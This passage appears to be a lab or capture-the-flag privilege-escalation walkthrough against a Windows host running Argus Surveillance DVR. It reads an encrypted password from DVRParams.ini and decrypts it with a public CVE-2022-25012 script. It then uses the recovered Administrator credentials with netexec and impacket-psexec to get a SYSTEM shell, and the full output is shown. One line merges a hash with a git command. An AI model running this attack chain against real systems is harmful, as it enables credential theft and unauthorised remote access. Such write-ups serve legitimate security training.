Priv Esc
C:\Users\viewer>type "C:\programdata\PY_Software\Argus Surveillance DVR\DVRParams.ini"
ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8
5E534D7B6069F641E03BD9BD956BC875EB603CD9D8E1BD8FAAFEgit clone https://github.com/s3l33/CVE-2022-25012.git$ python CVE-2022-25012.py ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8
$ netexec smb 192.168.151.179 -u 'Administrator' -p '14WatchD0g$'
$ impacket-psexec Administrator:'14WatchD0g$'@192.168.151.179
Impacket v0.12.0.dev1+20240807.21946.829239e - Copyright 2023 Fortra
[*] Requesting shares on 192.168.151.179.....
[*] Found writable share ADMIN$
[*] Uploading file NGrMDuKE.exe
[*] Opening SVCManager on 192.168.151.179.....
[*] Creating service rLbH on 192.168.151.179.....
[*] Starting service rLbH.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.19044.1645]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32> hostname && whoami.exe && type C:\Users\Administrator\Desktop\proof.txt && ipconfig
DVR4
nt authority\system
04f0f21abdd5d60c6860e64f1c416a2e
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.151.179
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.151.254
C:\WINDOWS\system32>
Last updated